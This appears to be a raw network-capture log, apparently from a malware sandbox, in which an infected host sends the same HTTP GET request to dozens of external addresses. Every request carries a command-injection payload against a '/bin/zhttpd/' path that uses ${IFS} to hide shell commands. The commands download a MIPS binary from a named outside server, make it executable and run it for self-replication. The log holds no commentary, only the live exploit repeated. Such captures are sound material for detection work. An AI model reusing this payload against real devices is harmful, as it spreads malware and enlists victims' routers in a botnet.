                                            Feb 2, 2024 06:20:30.221123934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            406192.168.2.153804631.191.67.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:30.221158981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            407192.168.2.154973891.31.130.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:30.221230030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            408192.168.2.1559844220.240.188.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:30.221384048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            409192.168.2.154895671.131.180.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:30.221416950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            410192.168.2.155217435.251.30.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:31.225260019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            411192.168.2.154375899.168.197.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:31.225322008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            412192.168.2.1538624218.213.51.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:31.225349903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            413192.168.2.1559012115.213.43.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:31.225384951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            414192.168.2.1545020183.101.201.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:31.225436926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            415192.168.2.1537436118.14.133.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:31.225472927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            416192.168.2.1547958146.193.85.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:32.228610039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            417192.168.2.1534402122.13.158.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:32.228652954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            418192.168.2.154790872.82.210.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:32.228677034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            419192.168.2.154994637.93.191.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:32.228702068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            420192.168.2.155449044.18.87.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:32.228730917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            421192.168.2.154062077.168.240.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:32.228739977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            422192.168.2.1559706220.5.148.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:32.228764057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            423192.168.2.153755496.92.232.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:32.228806973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            424192.168.2.1533020201.254.206.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:32.228856087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            425192.168.2.153710891.169.52.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:32.228873014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            426192.168.2.155242658.245.6.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:32.228893995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            427192.168.2.154500018.103.130.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:32.228903055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            428192.168.2.1537606218.228.137.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:32.229044914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            429192.168.2.155631485.109.247.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:32.229083061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            430192.168.2.1544578111.161.65.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:32.229084015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            431192.168.2.1551110217.34.66.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:33.232393980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            432192.168.2.1558682178.38.97.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:34.245313883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            433192.168.2.1554398114.81.221.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:34.245358944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            434192.168.2.1550188196.197.112.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:34.245393991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            435192.168.2.154880237.63.132.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:34.245429039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            436192.168.2.1544072155.248.96.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:34.245429993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            437192.168.2.1551792199.78.140.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:34.245439053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            438192.168.2.154321827.72.4.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:34.245455980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            439192.168.2.1537862178.135.37.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:34.245588064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            440192.168.2.153714890.169.118.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:34.245666027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            441192.168.2.1534440189.19.212.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:35.248838902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            442192.168.2.1551408208.30.5.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:35.248876095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            443192.168.2.155525845.73.137.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:35.248908043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            444192.168.2.1553388189.43.20.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:35.248931885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            445192.168.2.1542018131.238.96.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:35.248984098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            446192.168.2.1533532136.249.19.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:35.249017000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            447192.168.2.1556486121.237.50.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:35.249039888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            448192.168.2.1557932198.124.227.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:35.249056101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            449192.168.2.155506695.54.78.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:35.249090910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            450192.168.2.153999277.145.233.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:35.249109983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            451192.168.2.154848299.29.182.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:35.249167919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            452192.168.2.1534402128.214.154.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:35.249211073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            453192.168.2.155210034.164.85.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:35.249253035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            454192.168.2.153995637.105.187.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:35.249521971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            455192.168.2.155928473.154.204.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.253757000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            456192.168.2.155521418.108.170.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.253792048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            457192.168.2.1552126212.221.102.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.253802061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            458192.168.2.155510060.240.117.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.253835917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            459192.168.2.156024046.20.163.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.253873110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            460192.168.2.154814053.18.189.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.253906012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            461192.168.2.15500462.173.48.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.253928900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            462192.168.2.1546652131.225.156.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.253937006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            463192.168.2.1557462118.146.102.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.253973961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            464192.168.2.1549886146.72.80.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.254015923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            465192.168.2.1559894200.112.78.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.254039049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            466192.168.2.1533978106.122.250.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.254057884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            467192.168.2.1557880190.252.250.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.254086018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            468192.168.2.154077414.215.51.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:36.254142046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            469192.168.2.1535368168.241.126.97443
                                            TimestampBytes transferredDirectionData
